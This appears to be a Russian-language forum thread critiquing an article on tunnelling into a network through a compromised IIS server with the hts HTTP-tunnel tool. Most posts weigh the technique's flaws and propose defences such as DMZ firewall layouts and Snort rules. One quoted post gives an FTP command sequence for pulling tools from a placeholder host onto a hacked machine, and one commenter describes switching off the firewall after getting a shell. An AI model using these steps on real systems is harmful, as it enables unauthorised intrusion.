to Paco: Проблем с установкой hts нету. Запускаем у себя любой ftp сервер. Любая винда имеет ftp клиента, далее c:\ftp ftp>open 222.222.222.222 ftp>get ... и т.д. Проблема в другом: в любой нормальной компании есть сервер сислог, и об этом сразу же станет известно админу.
Rossa пишет: to Paco: Проблем с установкой hts нету. Запускаем у себя любой ftp сервер. Любая винда имеет ftp клиента, далее c:\ftp ftp>open 222.222.222.222 ftp>get ... и т.д. Проблема в другом: в любой нормальной компании есть сервер сислог, и об этом сразу же станет известно админу.
И что???? поздно пить боржоми когда почки отказали. будет ему известно, а пусть теперь он попробует удалить то, что было поставлено на машины "клиентов" ... [IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG] Что - то меня понесло как остапа ... [IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG] Надо изначально подготавливать систему к такой ситуации, что любая станция может стать: свой среди чужих, чужой среди своих (что гораздо чаще), но как показыает практика чужой в 99% это мелкий пакостник не понимающий всей ситации, эх господа есть же неписанное правило НЕ ТРОГАТЬ своих, а если тронули это или дятел вчера скачавший спайдер либо проф высокого класса действующий по заказу (тогда аминь вам [IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG] [IMG]http://www.securitylab.ru/forum/smileys/smiley9.gif[/IMG] )
После прочтения фразы: "Атакующий взламывает веб сервер с установленным IIS. Не важно какой именно эксплойт он использует, важно то, что он способен эксплойтировать сервер и получить доступ к системе через командную строку.", прекратил чтение... нах лезть в сеть (за искл. добычи ком. тайн), т.к. большинство взломов делается лишь для владения ip и атаки дальше или для спамерства... имхо.
Мда...интересно автор хоть какое-то время реально пользовался програмой? 1. Для того что-б hts слушал 80 порт нужно застопить MS IIS. Тоесть если для доступа к ВЕБ-серверу открыт только 80-й порт то будет тяжело не заметить не работающий IIS 2. hts сам по себе особо кривой Тоесть он делает проброс исключительно одного соединения. Хотите продключится на два порта ... ну запустите hts слушающими два "входных" порта. Что вообще смешно ... 80-й то порт один 3. К сожалению специфика HTTP-тунелинга такова, что "удержание" тунеля связано с постоянными закрытиями соединения (POST/GET) по таймаутам и т.д. Тоесть если нету сессии - идентификации соединения (а его у hts) нету ... то при обломе он просто теряет соединение (то что он тунелировал). И прога, которая работала через тунель ддолжна заново открывать по новой соединение 4. .......
По сему пришлось писать свою тунелировалку удерживающую соединения, идентиф. юзеров, работа в качестве модуля/скрипта/... под ВЕБ-серверами (для проброса трафика именно через ВЕБ-сервер, а не вместо него) и т.д. Это не реклама Так-как проект писался и делался для одного большого проекта. Тоесть есть клиентсий софт, которому нужно установить соединение с сервером через TCP-порт. А админы не просто не хотят открыть "исходящие соединения", они просто установили прокси и через него дают выход в мир (а NAT-инга/port-forward-инга нету). Вот и пришлось писать клиента, прилагаемого к софту и обеспечивающего втоматом настройку/проверку доступности/...
Гость пишет: а там уже не важно за брендмауером или до брендмауера... главное смд запущена.
Статья туфта, автор поц.
- "Атакующий взламывает веб сервер с установленным IIS. Не важно какой именно эксплойт он использует, важно то, что он способен эксплойтировать сервер и получить доступ к системе через командную строку" А после этого мы, блин, заливаем софту для туннелирования... Ооооочень круто, но нахрена козе * ? Если у Вас уже есть эксплойт, который позволяет получить "командную строку", то нафига уже все остальное городить, остальное дело техники и если Вам предлагается бахнуть иис, то с таким же успехом можно вырубить файр, как я и делаю часто. Проломился на командную, вырубил файр. Убил бобра - спас дерево. - Теперь по поводу файра. А если у меня стоит нормальный файр, а не встроенная туфта от дяди билли и правило в виде "на выход только опера на 80 порты \ на вход только IIS на 80й порт на этот адрес". Ну поздравляю Вас с тем что вы установили мне хтс, ну пусть Вы даже бахнули мой иис и я такой дурак, что не заметил, ДАЛЬШЕ ЧТО? Туннелируйте господа, туннелируйте. И этой "идее" (кстати, вот Вам и "идея" защиты) уже куча лет. Ах вы файр из командной полезете выключать.... А зачем тогда туннелирование? - Ну и пусть даже хтс работает как сниффер при живом иис (только нужно юзера попросить установить винпкап или пакетх заранее), ДАЛЬШЕ ЧТО? Хтс ручками будет формировать и слать "сырые" пакеты и снифферить входящие? ИИС здесь ему не поможет. Именно "своего" тсп соединения сниффер НЕ ПОЛУЧИТ!!! - А в чем тогда вообще смысл? Если Вам удалось пробить на командную строку и залить хтс, значит со входом и заливом инфы проблем нет, зачем этот фокус? Классно вышло, хтс поможет Вам пробить файр на вход, только для этого Вам нужно как то получить консоль и залить туда хтс. Если я это могу делать без хтс, ТО НАХРЕНА ОН МНЕ? - Туннелирование нормальные люди используют дабы обойти файр что бы ВЫРВАТЬСЯ через файр, а не ВОРВАТЬСЯ. Например трояны.
В принципе может имелось в виду, что придет злая тетя бухгалтерша и по просьбе своего сыночка-хакерёночка запустит тихонько на сервере с дискетки хтс. Так автор бредит именно про командную строку и залив хтс. Да и не пустит нормальный файр этот хтс в любом случае. Да и при живом иисе не запустится. А по поводу сниффинга... С ним что, идет драйвер для перехвата пакетов? (Винда-с СЭЭЭЭР!!!!) И админа надоть попросить его поставить, аргументируя тем, что "иначе хак не идет"? И хтс потом сам устанавливает тсп соединение, ручками?
Существует схема с двуся Firewall'ами: Outworld---FW1--DMZ--FW2--LAN Причем описана прямо в линуксовых howto При грамотной настройке правил для доступа к ресурсам DMZ из внешнего мира и локалки - атакующий в лучшем случае угробит сервак в DMZ
из статьи можно сделать вывод, что: - неплохо бы запрещать доступ серваков в DMZ друг к другу - неплохо бы разрешать сервакам в DMZ коннектиться во внешний мир только по тем портам, что им положены (DNSсу только к DNS портам, SMTP серверу только к SMTP портам других серверов) - неплохо бы посмотреть если ли в SNORT правило определяющее что в трафике HTTP работает HTTP-tunnel. если нет, то написать самому
хотя конечно все это только часть необходимых шагов
Мне всё-таки осталось не понятно, зачем в случае предложенной автором схемы сети нужно запускать корявый hts.exe если можно без всяких проблем запустить любой прокси сервер (например socks) или на худой конец простой port-forwarder прямо на том же 80 порту. Убить httpd(iis) то придётся в любом случае
Работают они прекрасно по сравнению с hts.exe и без лишней пыли.
Так что использование HTTP-tunnel в этом случае - излишний гемор и ничего больше
В случае защиты WWW от Atack Host с помощью IDS hts.exe всё равно не выход, так как достаточно добавления одного правила и трафик будет фильтрован.
Ситуации, описанные в статье несколько надуманы.
HTTP-tunnel обычно используют для ВЫХОДА из сети. Однако и при этом существуют и более простые способы передачи данных.